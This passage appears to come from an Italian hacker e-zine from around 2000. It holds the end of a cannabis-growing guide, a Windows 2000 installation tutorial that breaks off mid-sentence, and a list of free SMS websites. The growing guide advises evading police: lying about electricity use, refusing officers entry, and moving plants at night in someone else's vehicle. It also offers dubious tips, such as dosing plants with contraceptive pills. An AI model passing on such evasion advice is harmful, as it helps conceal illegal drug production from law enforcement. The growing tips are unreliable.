come le gemme non hanno molto aroma quando le cogli, ma che in alcuni casi pu risultare 
gradevole.
Un generatore di ioni negativi pu essere acquistato per 15, 100 dollari a seconda del 
modello e della potenza erogata. Alcuni hanno cicli invertiti che accumulano la polvere 
in un piatto caricato. E' anche possibile usare una lamina di alluminio con la messa a 
terra e porla sul muro o sulla mensola dove si trova lo ionizzatore, per raccogliere queste 
particelle. Soltanto pulisci completamente la lamina una volta al mese. Dovrebbe essere 
collegata ad un cavo elettrico di messa a terra. Se non ricopri il muro e la mensola con una 
carta o una lamina, il muro diventer nero dalla polvere che riceve dall'aria, e poi ti 
toccher ridipingerlo.


OSSIGENO

L'O2 alle radici  un grande problema, dal momento che la pianta lo richiede per assimilare 
i nutrimenti, e liberarli dalle tossine, ecc... Una delle cose pi facili da fare  servirsi
 di cibo a base di perossido di idrogeno nell'acqua per aumentare la disponibilit di ossigeno
 nell'acqua stessa. H2O2 ha un atomo di ossigeno in pi che si divider facilmente e che potr
 essere usato dalla pianta. Oxygen Plus  un alimento per piante che contiene il 25% di
 perossido di idrogeno ed  perfetto per questo uso.
Usando una soluzione per piante che permette una abbondante ossigenazione  lo stesso
 veramente importante. Assicurati di avere un buon drenaggio usando Perlite, sabbia, o 
ghiaia nella tua miscela e nel fondo dei vasi. Non usare un mezzo che trattiene troppa acqua,
 o puoi significativamente ridurre l'ossigeno a disposizione della pianta. Pi su questo 
argomento nella sezione 'Colture idroponiche'.
Ossigenare l'acqua prima dell'innaffiamento  altrettanto una buona idea. Nel caso di piante
 in vasi di terra, usa una pompa d'aria per gassare l'acqua durante la notte prima di 
innaffiare le tue piante, o metti l'acqua in un contenitore con un coperchio e scuotilo molto
 bene prima di somministrarla alle piante.



SICUREZZA E RISERBO

Le societ elettriche possono rivelare che la tua bolletta  molto cambiata rispetto allo
 stesso periodo dell'anno precedente, e in questo modo la polizia riesce a beccare i
 coltivatori. Pi di 500 watt  utilizzati in continuazione all'interno di una famiglia
 potranno far s che si venga segnalati per incremento mensile costante nel consumo di 
energia elettrica. Puoi dire di avere un riscaldamento autonomo, molte persone che vivono 
in fabbricati lo possiedono, e anche molti televisori, accesi anche a tarde ore, se ti
 fanno un accenno (senza malizia). Se bussano gli sbirri e te lo chiedono, non lasciarli
 entrare, e sposta le tue piante in un altro posto durante le ore piccole, magari in un
 veicolo non di tua propriet.
Una volta spostate in un nuovo posto, pu essere preferibile ripristinare immediatamente un 
alto consumo di energia, in modo che la cronologia del tuo consumo energetico non smascheri 
le tue attivit in futuro.
Fuoriuscite di luce, finestre aperte, calore emanato da stanze che normalmente dovrebbero
 essere fredde, e bollette salate sono tutti problemi seri di cui dovresti preoccuparti. Non 
lasciare acceso l'allarme antifurto quando vai via da casa. Molte persone sono state arrestate
 quando dei marmocchi cercavano di rubare il prezioso giardino e sopraggiungeva la polizia. 
Chiudi bene la casa, e lascia che le prendano se ne hanno proprio bisogno. In fondo non vale
 la pena essere arrestati per furto...
Pensa in anticipo ad ogni situazione che richieder una visita alle aree sensibili della casa
 da parte di estranei. Riparatori, venditori a domicilio, letturisti del gas-luce-acqua,
 vicini, periti stimatori, ed animali domestici devono tutti essere considerati e di
 conseguenza bisogna pianificare in anticipo.



ACQUA DISTILLATA

Alcuni coltivatori riportano che acqua purificata o distillata aiuta le loro piante a crescere
 pi velocemente. Forse ci  dovuto al sodio e ai metalli pesanti che si trovano nell'acqua
 pesante che non sono presenti nell'acqua purificata. L'acqua pesante tende a formare depositi
 di sale alcalino nel terreno che bloccano i minerali in tracce, e provocano carenze di ferro,
 rame e zinco. Ci sono diversi tipi di acqua purificata, ma molti non sono privi di minerali 
che possono causare la formazione di sale per un esteso periodo di tempo.
L'acqua di rubinetto arriva in due modi. Calda e fredda. Il tubo che porta l'acqua fredda ha
 una minor formazione di calcio e sodio al suo interno, e dovrebbe essere privo di sedimenti
 una volta che il rubinetto  stato aperto e l'acqua  lasciata scorrere per 30 secondi. 
L'acqua calda avr ruggine, depositi di piombo, e molto sodio e calcio, tanto che te ne
 accorgerai facilmente. Usa solo la quantit di acqua calda richiesta per raggiungere la 
corretta temperatura dell'acqua (20-25C). L'acqua di rubinetto filtrata attraverso un filtro
 di carbone sar priva di cloro e di particelle molto grandi, ma conterr ancora solidi
 disciolti come sodio e metalli pesanti (piombo, arsenico, nichel, ecc...).
L'acqua purificata in bottiglia dovr essere o Reverse Osmosis o alcuni tipi di acqua filtrata
 carbone/sedimento. Quando acquisti l'acqua in un negozio, a meno che sia RO o Distillata, fai
 a meno di comprarla. Pu avere ancora gli stessi solidi disciolti e metalli pesanti che ha la
 tua acqua di rubinetto.


PILLOLE ANTICONCEZIONALI

Una soluzione con una pillola in 4 litri di acqua  stato riportato che provoca un aumento
 della velocit di accrescimento nelle piante di pomodoro. E' possibile che questo aiuti
 anche le piante di maria. Un trattamento somministrato prima della fioritura ed uno alcune 
settimane prima del raccolto potrebbe aiutare la pianta a maturare pi velocemente.
Un coltivatore ci ha riportato una storia su di uno stesso tipo di piante, una trattata con 
estrogeni  cresciuta fino a 6 metri, mentre l'altra  rimasta a 2 metri. Questo pu essere
 puramente aneddotico, ma potrebbe funzionare. Provalo e riferiscici i risultati.



CONSERVAZIONE DI SEMI E GEMME

Usa un barattolo sigillato di quelli per conservare alimenti per sigillare ermeticamente il
 sacchetto sotto vuoto. 
Congelalo o mettilo in frigo, e le gemme e i semi possono essere conservati per anni in 
questo modo.
Sbatti i semi in una carta assorbente per assorbire l'umido. Conservali nel congelatore, 
e togli solo tanti semi quanti te ne servono, quindi rimettili subito nel congelatore.




COMMENTO FINALE

Ottimi risultati possono essere conseguiti anche in situazioni che possono apparire alquanto
 marginali. (ad esempio: un vaso da 10 cm in una stanza con un lucernario). Con un minimo di:
 ambiente di coltura ben drenato, buona luce con ventilazione, applicazione regolare di un
 fertilizzante completo, controllo dei parassiti, e precauzioni antisgammo, chiunque pu 
portare un seme vitale alla maturazione.
Uno non ha necessariamente bisogno di possedere molti soldi, o anche conoscenze specifiche,
 per coltivare buone piante.




Un ringraziamento speciale a Romanoff ke mi ha affascinato e mi ha fatto entrare nel
 fantastico mondo della Maria e dell' Ash!!! un 10x anke a Niki a Cico e a Giulia ke pur nn
 appoggiandomi completamente mi ha aiutato!!! e come nn ringraziare Syn??!! ........ mmmmmm 
ecco.....io......vabbe' V.P.N. strunz'! BUON RACCOLTO A TUTTI!!
Phaet (se volete qualke     consiglio vesa8_34@yahoo.it) 


 
-----------------------------------------=Miscellanea=-----------------------------------------


              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	     GUIDA ALLA FACILE INSTALLAZIONE DI WINDOWS 2000        
              	                                             sYn&Norman^B^  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Disclaimer: Questa guida e' basata solo sulla mia conoscenza personale, e non 
dovrebbe essere considerata come un'alternativa alla procedura d'installazione 
certificata da Microsoft. 
L'autore non si prende responsabilita' per altrui azioni.
__________________________________________________________________

Questo  il primo articolo di una serie che sara' riguardante Windows2000 (ebbene s). 



=====> Una piccola premessa sulla famiglia Microsoft Windows 2000  <=====

Questo tutorial insegnera' come fare un'istallazione di Windows 2000 in modo facile, 
scorrevole e senza difficolta'.
Per prima cosa bisogna decidere che tipo di ditribuzione andremo ad installare, Microsoft ha 
rilasciato (per ora) tre Windows2000:

	* Windows 2000 Professional
	* Windows 2000 Server
	* Windows 2000 Advanced Server
	* Windows 2000 Datacenter Server

Microsoft Windows 2000 possiamo definirlo NT questo perch  "E' stato realizzato con la 
tecnologia NT" .Questo rappresenta anche un vero appoggio multi-lingue, infatti offre vari 
packs di varie lingue.
Cio' significa:

== Avere la stabilita' e le performance della tecnologia NT ==
Windows 2000 prende dei tradizionali valore dei sistemi NT: stabilita', performance e 
sicurezza delle informazioni. Che permette un'alta sicurezza delle informazioni dando 
all'utente la possibilita' di criptare il file system (EFS), assegnare uno spazio nascosto 
e sicuro per usare VPN, liberare il sistema di sicurezza Kerberos, funzioni multiutente, e 
molto altro.

== Abbassare il costo totale del possesso ==
Windows 2000 ha molte caratteristiche incorporate, come l'IntelliMirror e le Active 
Directories. Queste caratteristiche permettono soluzioni piu' efficienti per la gestione del 
sistema. 


[== Differenti Edizioni ==]

-> L'edizione Professional e' progettata per gli utenti privati o le piccole aziende, o come 
dice Microsoft, "E' Un sistema operativo desktop per gli affari in Internet". 

-> L'edizione Server e' studiata per l'organizzazione di reti avanzate. Include molta gestione 
dei server della rete, nonche' utility per l'amministrazione. Contiene Active Directories, 
Kerberos, i sistemi PKI, Windows Terminal Services, e molte altre utility.
Windows 2000 Server supporta fino a 4GB di RAM e 4 processori.

-> L'edizione Advanced Server e' stata rilasciata per per le aziende e le corporazioni piu' 
grandi. Contiene il supporto per 8 processori, una eccellente gestione delle applicazioni, e 
una stabilita' sorprendente. L'edizione Advanced Server contiene l'Enterprise Memory 
Architecture - EMA, il sistema multiprocessione simmetrico - SMP, e la gestione avanzata dei 
database.

Focalizzero' l'articolo sulla versione Professional, perche' e' progetata per le case e per 
le piccole industrie, mentre le altre due sono dedicate alle aziende piu' grandi.
Presuppongo che tu sia gia' in possesso del disco di installazione quindi non ti spiegero' 
dove trovarlo e quanto costa. Per comprarlo rivolgiti ad un rivenditore di software.

=====> "Comincino le danze" oppure Installare Windows 2000  <=====

[=== Installazione completa o Aggiornamento ===]
Questa domanda mi e' stata rivolta molte volte ma la risposta e' molto semplice: dipende 
dalle tue necessita'. Vediamo i pro e i contro di una installazione completa e 
dell'aggiornamento.

- Il miglior vantaggio di un'installazione completa e' che si e' salvi dalle varie 
incompatibilita' dei drivers. Se installi Win2000 su una precedente installazione di 
Windows, Win2k potrebbe usare vecchi driver presenti sul sistema, causando instabilita'.

- D'altro canto, e' ovvio che aggiornando il sistema non si perdono i vecchi programmi.

Quindi la scelta e' solo tua.
Per essere piu' sicuri della stabilita' fai un'installazione completa, ma se non puoi 
reinstallare tutto il tuo software che avevi fai un'aggiornamento.

-> Il Setup <-
(Nota: scegli il modo piu' conveniente per avviare l'installazione. La prima e' valida sia 
per l'aggiornamento che per l'installazione completa)

Avvio del Setup 1: Ora, dopo aver fatto questa importante decisione, inserisci il cd di 
Win2000 nel lettore sotto windows, e aspetta l'avvio automatico (se il setup non parte 
automaticamente avviarlo eseguendo il file "Setup.exe" nella directory principale del cd).
Nella prima schermata, scegli tra Aggiornamento o installazione completa.

Avvio del Setup 2: (Solo per installazione partendo da zero)
Nel caso che tu non abbia Windows gia' installato, puoi avviare il sistema direttamante 
dal cd. Prima cosa, abilita il boot dal cd nel BIOS del sistema (fai attenzione, non cambiare 
nulla di cui non sei sicuro, consulta ben il manuale della scheda madre), Quindi inserisci il 
cd e avvia il computer. Se il tuo BIOS non puo' avviare il pc dal cd-rom, puoi creare il 
dischetto di avvio col programma apposito incluso sul cd di installazione 
(\bootdisk\makeboot.exe).

Installazione (configurazione di base e copia dei file)
Segui le istruzioni del setup che ti compariranno sullo schermo per le prime configurazioni 
di base.

Dopo qualche diagnosi del sistema, il setup incomincera' a copiare i file. 
Dopo che questa operazione e' terminata il setup resettera' il sistema e lo fara' partire in 
Windows 2000 per il prossimo passo dell'installazione. Questa fase dell'instalalzione sembra 
svolgersi in dos, ma in realta' si svolge gia' in Windows 2000 


[== NTFS o FAT? ==]
Il file system NTFS e' piu' veloce, affidabile, ed ha piu' qualita' che il sistema FAT32 o FAT.
Io raccomando di scegliere di convertire il drive in NTFS. Ma, nota bene che nel caso tu 
abbia un sistema con due boot, L'altro sistema operativo non riconoscera' la partizione NTFS, 
per esempio se hai installato anche win95 e il dos, questi non saranno in grado di leggere 
quella partizione.


[== Componenti da installare ==]
Questa e' una tua decisione personale, dipende dalle tue necessita'. Io posso solo descrivere 
i componenti piu' importanti e le loro funzionalita'.

* IIS - Internet Information Services:
   Nel caso tu debba avere il tuo web, ftp, e/o il server mail, installa il pacchetto. 
Un altro uso per l'IIS e' la prova locale dei file ASP, che ricjiedono appunto 
l'installazione dell'IIS web server. Comunque, puoi sempre installarlo o rimuoverlo 
in seguito dal pannello di controllo.
IIS permette di creare piu' siti su un solo indirizzo IP, e rende facile creare siti 
intranet.IIS contiene il supporto per il contenuto dinamico, come ASP, CGI e ISAPI, e 
permette agli sviluppatori di web di includere componenti Activex nei propri siti. IIS 
ha il Secure Socket Layer (SSL) che protegge il trasferimento di dati tra il client e il 
server.
Un'altra importante funzione di IIS 5.0 e' la possibilita' di essere gestito anche dalla rete.

* Indexing Service
  L'indexing service e' utile sui grandi hard disk con una buona performance. Indicizza i 
file del sistema per permettere una ricerca piu' veloce. Permette di cercare rapidamente 
perole contenute nei file.
Puoi facilmente personalizzare ed impostare l'Indexing Service. Puoi controllare il processo 
di indicizzazione, scegliere di indicizzare solo particolari directory, e configurare il 
servizio per ottimizzarne le prestazioni.


* La maggior parte degli altri componenti sono relativi alla rete, e non sono necessari se il 
pc non fa parte di una rete locale LAN (Local Area Network).


[== Troubleshooting ==]
Come la maggior parte dei prodotti Microsoft, Windows 2000 ha un'interfaccia di setup molto 
semplice ed user-friendly. Ma, naturalmente, si possono verificare vari errori.

-> Blocchi di sistema
Se per caso (succedera' sicuramente) il sistema dovesse bloccarsi (col classico schermo blu) 
resetta, e il setup automaticamente continuera' l'installazione. Ma se i blocchi si 
verificano spesso, e' probabile che tu abbia un hardware incompatibile con Windows 2000. In 
questo caso dovresti consultare l'HCL - Windows 2000 Hardware Compatibility List (incluso 
sul cd di installzione, \support\hcl.txt), e/o scaricare il "Microsoft Windows 2000 
compatibility check program" (sul sito web www.microsoft.com).

Ecco una lista dei piu' comuni crash di Windows 2000 e la loro spiegazione:

^
- IRQL_NOT_LESS_OR_EQUAL -
Meaning that the core tried to gain access to a certain memory segment which is at a higher 
level of an Interupt Request Level (IRL) then allowed. While the proccess only allowed 
to have access to and IRL level no higher then their own.


Recommendation: This error is probably caused by a faulty driver or a system service. Try 
using the "Last Good Known Configuration" option in the safe boot menu (F8 on boot).

Note: If the error surfaces while installing Windows, check that all of your drivers are 
compatible with Windows 2000 (consult the HCL).


- KMODE_EXCEPTION_NOT_HANDLED -
This error is generated when the core can't handle a certain directive.

Recommendation: The error might show you the name of the faulty driver. Try disabling it 
while booting into Safe Mode.

Note: The situation can sometimes resolved using the Recovery Console.


- NTFS_FILE_SYSTEM - 
This error is generated when there is a problem with the Ntfs.sys driver, which is meant to 
access inform







sYn & Norman^B^   w w w . h a c k e r s a t . c o m


              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	                      MONDO SMS                             
              	                                                            
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



Inviare gratis SMS a cellulari italiani

Elenco dei principali siti per l'invio di SMS da Web e da e-mail. L'elenco  aggiornato 
ad Ottobre 2000 e potrebbe subire variazioni in considerazione della nuova politica che 
i nostri gestori potrebbero mettere in atto sulla consegna degli SMS (adesso per un 
gestore  gratis, in futuro, forse, diverr a pagamento). Nell'elenco sono stati 
volutamente eliminati quei siti non dotati di un gateway proprio e che offrono il 
servizio in collaborazione con altri (come SMShome.net che attualmente collabora 
con Clarence). I siti sono stati suddivisi in categorie, per una pi facile consultazione.

Ove non specificato altrimenti, sono sottintesi i seguenti parametri:

invio: gratuito

registrazione al sito per l'accesso: non richiesta

lunghezza massima per SMS: dato non pervenuto

possibili destinatari SMS: tutti i cellulari italiani (non  garantito l'ETACS)

totale SMS inviabili al giorno: dato non pervenuto


--------------------------------------------------------------------------------

Categoria -> siti specializzati
  <<< Nati intorno alla telefonia mobile, i siti "specializzati" offrono oggi il 
massimo dell'integrazione tra SMS e e-mail, calendari, fax, informazione e servizi, 
come loghi e suonerie. Qui l' SMS  alla base del business ! >>>

 Quios * * * * *
Dopo l'enorme successo in tutto il mondo, Quios (si leggi "chi-os" arriva in Italia, con 
servizi innovativi. L'invio di SMS (max 128 caratteri) a qualunque utente nel mondo si 
rivela molto rapido. Si fa apprezzare la gestione della rubrica, che prevede la creazione 
di gruppi.  inoltre possibile ricevere gratuitamente la notifica di ricezione e-mail via 
SMS, riportante il mittente e il titolo. Oltre a gestire un'agenda personale che notifica 
gli eventi via SMS (come l'italiano ProntoAgenda),  possibile anche richiedere l'invio 
differito di SMS, ovvero ad una data prestabilita (ad esempio fare gli auguri ad un amico 
il giorno del suo compleanno). In diverse lingue sono sempre disponibili servizi 
d'informazione curati direttamente da Quios (oroscopo, previsioni del tempo, news 
in collaborazione con Slashdot.org e altro) o, con Planet Quios, dai reporter, 
ovvero esperti che hanno deciso di collaborare gratuitamente con Quios per fornire 
ogni genere d'informazione (la lista  lunghissima e ci siamo anche noi - reporter 
aquilareale).
Possibilit per chi ha un sito di essere sempre raggiunto via SMS, senza dover dare 
il proprio numero di cellulare.
http://www.quios.com/

 WikeyFun * * * * *
Un sito per appassionati.  l'unico sito che consente di indicare un mittente qualsiasi (ad 
esempio  possibile inviare un SMS col nome DIO ...). SMS da 160 caratteri e disponibili in 
modalit Flash. Loghi e picture SMS per cellulari Siemens - altra rarit - completano il 
quadro. Presto anche giochi e suonerie.
http://www.wikeyfun.com/

 WAPPI * * * * *
Offre servizi WAP e web-mail di alta qualit. Per inviare SMS (di 142 caratteri) da web a 
qualunque cellulare GSM nel mondo occorre registrarsi presso WAPPI e anche presso 
CLUBNET (una vera trafila !). Di WAPPI per teniamo a precisare che  l'unico sito 
in Italia che invia il contenuto (e non un'anonima notifica) delle e-mail ricevute 
direttamente sul proprio cellulare tramite SMS. Peccato per l'obbligo al consenso del 
trattamento dati: di tanto in tanto (in verit raramente) WAPPI invia SMS sui cellulari 
degli iscritti per informarli di iniziative ed altro.
http://www.wappi.com/

 Clarence * * * * *
SMS da 160 caratteri, tanti loghi e suonerie. Insuperabile.
http://sms.clarence.com/index.php3

 UMAIL* * * * *
Servizio unificato tra e-mail e SMS (per tutti e soli i cellulari GSM). Occorre registrarsi e 
possono registrarsi solo gli utenti TIN, compresi gli utenti CLUBNET. Consente di ricevere 
e-mail via SMS e inviare e-mail tramite SMS. Le e-mail sono consultabili anche da web e 
da wap.  possibile inviare gratis SMS (137 caratteri) da web a tutto il mondo e, unico 
in Italia, consente di ascoltare le e-mail ricevute col telefono e rispondere (tramite 
allegato vocale) o trasferire su fax. A breve sar attivato anche l'invio gratuito di fax 
da web. 
http://www.umail.it/

 Mailsurf * * * * *
Europeo (anche versione italiana), occorre registrarsi. Permette di inviare SMS di 130 
caratteri (solo 20 al mese gratis, gli altri a pagamento). Da apprezzare la possibilit 
di inviare gratis - unico nel suo genere - fino a 30 lettere tradizionali al mese in tutto 
il mondo. Tra i servizi disponibili un calendario, spazio web, indirizzo di e-mail, 
cartoline elettroniche, fax (a pagamento), aste e scambio file. 
http://www.mailsurf.com/

 ProntoSMS * * * * *
ProntoSMS consente, solo agli utenti registrati, di inviare SMS di 147 caratteri a tutti i 
cellulari italiani (escluso BLU !!!). ProntoAgenda  invece un'agenda personale consultabile 
da web che avvisa con e-mail o SMS l'evento da ricordare al giorno e all'ora stabilita.
http://pronto.agenda.it/User/SMS/

 GSMBOX * * * *
Il primo portale europeo multilingue sulla telefonia mobile, anche in versione WAP. Oltre 
all'invio SMS (di 120 caratteri massimo), ci sono ulteriori servizi a patto di registrarsi. Si 
tratta essenzialmente dell'integrazione tra e-mail e cellulare e dell'offerta di servizi 
automatici di ricezione SMS a carattere tematico (sport, gossip, f1, borsa, meteo, viaggi, 
zodiaco).  l'unico sito che permette (agli utenti registrati) l'invio di SMS riportanti 
come mittente il loro numero di cellulare, consentendo cos la possibilit di una risposta 
immediata da chi riceve il messaggio.
http://www.gsmbox.com/

 CellForum * *
Forum di discussione sulla telefonia cellulare. Possibilit per gli utenti registrati di 
inviare 10 SMS al giorno (max 120 caratteri). I destinatari non possono essere utenti BLU 
n TIM TACS. L'invio  possibile solo da rubrica. Tra tanti limiti, l'unica nota positiva 
 rappresentata dall'archivio che riporta anche lo stato attuale del messaggio.
http://cellforum.made.net/

 Send it * *
Il noto Buongiorno by mail invade i cellulari con questo nuovo sito, Send it. Invio di SMS 
da 150 caratteri, solo per gli utenti registrati. Ci si pu sottoscrivere a molti servizi 
ricevibili via SMS, lo scotto da pagare  la ricezione ogni 4/5 SMS di 1 SMS a carattere 
pubblicitario.
http://www.send.it

 

Categoria -> siti stranieri abilitati all'invio di SMS verso l'Italia
  <<< All'estero certo non stanno a guardare. Lo svantaggio di questi siti  dato dalla 
lingua, il vantaggio dalla qualit e l'universalit. In generale i siti italiani sono 
meglio attrezzati: la possibilit di inviare SMS da web gratuitamente  ancora un miraggio 
in alcuni paesi, questi siti sopperiscono alla mancanza. >>>

 VIT * * *
In islandese, di difficile consultazione. Consente l'invio gratuito da web e da e-mail (senza 
pubblicit).
http://www.vit.is/

 MTN * * *
In inglese. Occorre registrarsi. Consente di inviare rapidamente SMS (max 147 caratteri) a 
quasi tutto il mondo (ma non ad utenti Omnitel !!!). Gradevole e originale l'interfaccia, che 
gestisce una rubrica e - uno dei pochi a concederlo gratis - lo storico dei messaggi (compreso 
lo stato del messaggio, ovvero se  stato realmente consegnato o meno sul cellulare del 
destinatario).
http://www.mtnsms.com/

 SMS.GATE.RU * * *
In russo. Consente di inviare SMS di 160 caratteri da web, oltre ad abilitare chiunque (non 
occorre iscrizione) all'invio di SMS via e-mail e viceversa. Nonostante l'assenza di una 
pagina in inglese, il sito  abbastanza fruibile e, grazie ai brevi esempi, il funzionamento 
 facilmente intuibile.
http://sms.gate.ru/

 

Categoria -> gestori di telefonia mobile
  <<< I nostri gestori permettono di inviare SMS da web. Il primo a dotarsi di questo 
strumento  stato Omnitel. In notevole ritardo TIM, che consente l'invio solo ai suoi 
utenti. >>>

 InWind * * * * *
InWind si propone quale portale multimediale e multiaccesso. Tutti i servizi sono rivolti 
agli utenti registrati. E-mail consultabili da WAP, Web e programmi di posta. Molti i 
servizi forniti tramite SMS: rubrica, servizi tematici ma anche di utilit, quali 
rubrica e notifica arrivo e-mail. Notevole la possibilit di chattare tramite SMS 
usando, da web, il nickname del destinatario piuttosto che il numero del cellulare - 
solo InWind offre questa possibilit - 
http://www.inwind.it/

 Il portale di BLU * * * *
SMS fino a 160 caratteri, e per gli utenti registrati (non occorre avere un cellulare BLU) 
anche la possibilit di inviare SMS da rubrica (prevista la gestione gruppi). Gli utenti 
BLU possono richiedere la notifica sul proprio cellulare all'arrivo di una e-mail (servizio 
gi attivo ma non ancora funzionante).
http://www.blu.it/

 Omnitel 2000 * * *
SMS da 140 caratteri sul portale di Omnitel 2000, inviabili a tutti. Per tutti gli altri 
servizi occorre registrarsi. Servizi di news e attualit via sms e wap, con lo stile e le 
risorse di un gestore di telefonia mobile.
E-mail consultabili dal sito WAP di Omnitel 2000, Web, programmi di posta e, unico nel suo 
genere, anche da telefono di rete fissa. Possibilit (per tutti) di inviare loghi, suonerie 
e - unico in Italia - picture SMS. Notifica arrivo e-mail via SMS. Servizi gratuiti e per 
tutti gli utenti. 
http://sms.2000.omnitel.it/

 Tim Universal Number * *
Dal sito  possibile inviare gratuitamente messaggi di 640 caratteri che verranno 
automaticamente divisi in pi SMS. Convergenza di diversi servizi tra e-mail, fax,
 SMS solo per clienti TIM. Notifica ricezione e-mail gratuita. Non tutti i servizi sono 
gratuiti, come la lettura di una e-mail via SMS ( 300 iva inclusa - il sito Wappi offre 
tale servizio gratuitamente). La notifica invece  gratuita.
http://www.uni.tim.it/

 Omnitel *
I servizi sono integrati con Omnitel 2000. Per gli utenti registrati ad Internet 
Mailbox (possibile a tutti, indipendentemente dal gestore) c' la possibilit di 
inviare SMS di 120 caratteri (solo ad utenti Omnitel) dalla pagina della posta. 
Francamente non si capisce perch dal sito di Omnitel si possono inviare SMS solo a 
cellulari Omnitel, da Omnitel 2000 invece a tutti.
http://imb.omnitel.it/

 

Categoria -> gestori di telefonia fissa
  <<< Anche i gestori di telefonia fissa consentono l'invio di SMS. Il servizio  
purtroppo ridotto all'essenziale. >>>

 Tibercom* *
Gestore di telefonia fissa del centro Italia, consente l'invio di SMS di 160 caratteri
http://www.tibercom.it/

 Lombardiacom *
Gestore di telefonia fissa del nord Italia, consente l'invio di SMS di 143 caratteri
http://www.lombardiacom.it/sms/

 

Categoria -> portali
  <<< I portali italiani, primi fra tutti Kataweb e Jumpy, sono dotati quasi tutti di 
un gateway SMS. In pochi hanno per sviluppato servizi a valore aggiunto. >>>

 Italia On Line * *
Veramente completo il servizio di invio SMS (massimo 140 caratteri) da web di Italia 
On Line (occorre registarsi). Rubrica e flash SMS, invio differito e - unico sul web - 
possibilit di salvare l'SMS nella propria casella di posta.
http://sms.iol.it/

 CiaoWeb * *
Portale tuttofare italiano, tra i pi dinamici. Oltre all'invio di SMS da 
web (120 caratteri), offre la notifica gratuita dell'arrivo di una e-mail via SMS.
http://www.ciaoweb.it

 Everyday.com * *
Occorre registrarsi per inviare gratuitamente ogni giorno un massimo di 10 SMS (lunghezza 
massima di 142 caratteri). Gli SMS sono inviabili a qualunque cellulare GSM nel mondo. 
Utile la rubrica personale che avverte con e-mail o SMS un evento da ricordare.
http://www.everyday.com/

 Infinito * *
Occorre registrarsi per inviare SMS da web e per accedere ai servizi di Infinito. 
Al momento della registrazione, purtroppo, occorre fornire il proprio numero di 
cellulare (indispensabile per l'accesso a tutti i servizi wireless).
La novit che propone Infinito  un accesso completo al proprio sito, con qualunque 
dispositivo. Non solo tramite internet, ma anche tramite cellulari WAP e computer 
palmari (attualmente sono abilitati: PalmPilot, Palm III, Palm V, Palm VII, Handspring 
Visor, Philips Nino, Casio Cassiopeia). E per i primi cellulari (quelli senza WAP) 
c' l'opportunit di iscriversi a canali tematici con ricezione del materiale tramite 
SMS. La ricezione degli SMS, cos come avviene per i siti concorrenti,  gratuita.
http://www.infinito.it/

 Jumpy * *
Solo 125 caratteri a disposizione per 1 SMS e una raccolta di frasi famose da inviare 
ad amici e conoscenti. Jumpy, portale generalista italiano, offre gli stessi servizi 
automatici di ricezione SMS a carattere tematico (sport, gossip, f1, borsa, meteo, 
viaggi, zodiaco) di GSMBOX, che infatti fa parte del Network di Jumpy.
http://www.jumpy.it/830sms.htm

 Cellularmania Kataweb Repubblica.it KwMusica CNNitalia.it Radio Capital Radio Deejay * *
CellularMania  un sito dedicato ai cellulari di buona qualit. Possibilit di acquistare i 
cellulari da web. Kataweb  un potente portale generalista italiano e nuovo gestore di 
telefonia fissa. Il gateway SMS (lunghezza massima 120 caratteri)  condiviso dai siti 
partner e la scritta "Sono espressamente vietate le forme di utilizzo professionale del 
servizio e quelle che prevedano una generazione automatica dei messaggi"  un avvertimento 
per webmaster e programmatori di software SMS circa l'utilizzo del gateway stesso. A questo 
proposito ricordiamo le lodevoli scelte diverse fatte da portali come Clarence.
http://www.cellularmania.com 
http://www.kataweb.it
http://www.repubblica.it
http://www.kwmusica.kataweb.it
http://www.cnnitalia.it 
http://www.capital.it
http://www.deejay.it

 SuperEva * *
Portale italiano. Invio di SMS da web (120 caratteri), possibilit di scegliere 
la modalit flash. Occorre registrarsi.
http://freesms.supereva.it/cgi-bin/index.chm

 Caltanet *
Giovane portale italiano. SMS di 140 caratteri, non occorre iscriversi.
http://www.caltanet.it/

 Monrif *
Portale recente. SMS di 140 caratteri gratis per gli iscritti verso tutti i 
cellulari italiani (escluso BLU !!!). C' di meglio sulla rete.
http://mysms.monrif.net

 E-loft *
Sito europeo degli studenti. SMS di 145 caratteri inviabili in tutta Europa.
http://www.it.e-loft.com/

 HOT *
Portale italiano. Invio di SMS da web (140 caratteri) riservato agli iscritti. 
Possibilit di ricevere SMS sulla F1.
http://www.hot.it/sms/

 Kiberlandia *
Portale italiano. Invio di SMS da web (110 caratteri, 120 caratteri agli iscritti). 
Ovvero il minimo indispensabile, anche meno.
http://www.kyberlandia.it/Servizi/SMS/default.asp

 

Categoria -> siti commerciali
  <<< Gli SMS sono usati anche da siti nati intorno all'e-commerce.
Vediamo come. >>>

 CHL * * * *
Occorre registrarsi presso CHL per godere dell'avanzato servizio di invio SMS da web. 
La lunghezza degli SMS  di soli 125 caratteri (il resto  pubblicit), ma  da 
sottolineare la possibilit di invio in modalit flash e la gestione della rubrica, 
con divisione in gruppi.  possibile usare gli SMS per fare acquisti (servizio Pocket). 
Possibilit di inviare anche fax gratuitamente.
http://www.chl.it/

 Flashmall * *
Ottimo sito di acquisti on-line, con una sezione dedicata all'invio gratuito di 5 SMS 
giornalieri di 125 caratteri ognuno. E' possibile chiedere di essere avvisati da un SMS 
all'arrivo di un prodotto qualora questo fosse indisponibile.
http://www.flashmall.it/sms.asp?action=sms

 

Categoria -> altri
  <<< Altri siti hanno pensato di usare gli SMS solo per attrarre utenti oppure per 
sviluppare progetti inediti, basati proprio sugli SMS. >>>

 Enel * *
Il principale fornitore di energia elettrica in Italia ha un portale tutto suo, con tanto 
di gateway per l'invio di SMS. La lunghezza massima  di 320 caratteri, quindi messaggi 
molto lunghi verranno divisi in 2 o 3 SMS (Enel aggiunge una firma alla fine dei messaggi)
http://www.enel.it

 GoingTonight *
GoingTonight non  il classico sito per l'invio di SMS da web. GoingTonight  una 
comunit o "il primo villaggio mobile del mondo", come amano definirsi. Consente agli 
iscritti di inviare fino a 100 SMS alla propria lista di destinatari. Cos, se un 
gruppo di amici vuole mettersi d'accordo sull'uscita serale, inviando un SMS a 
GoingTonight, GoingTonight si preoccuper di smistarlo subito agli amici. I quali, 
se sono iscritti, potranno rispondere. Superata quota 100, i messaggi si pagano. 
Inoltre si riceve pubblicit mirata via SMS. I messaggi possono essere inviati anche da web.
Possibilit per chi ha un sito di essere sempre raggiunto via SMS, senza dover dare il 
proprio numero di cellulare.
http://www.goingtonight.it/

 

Categoria -> Siti a pagamento
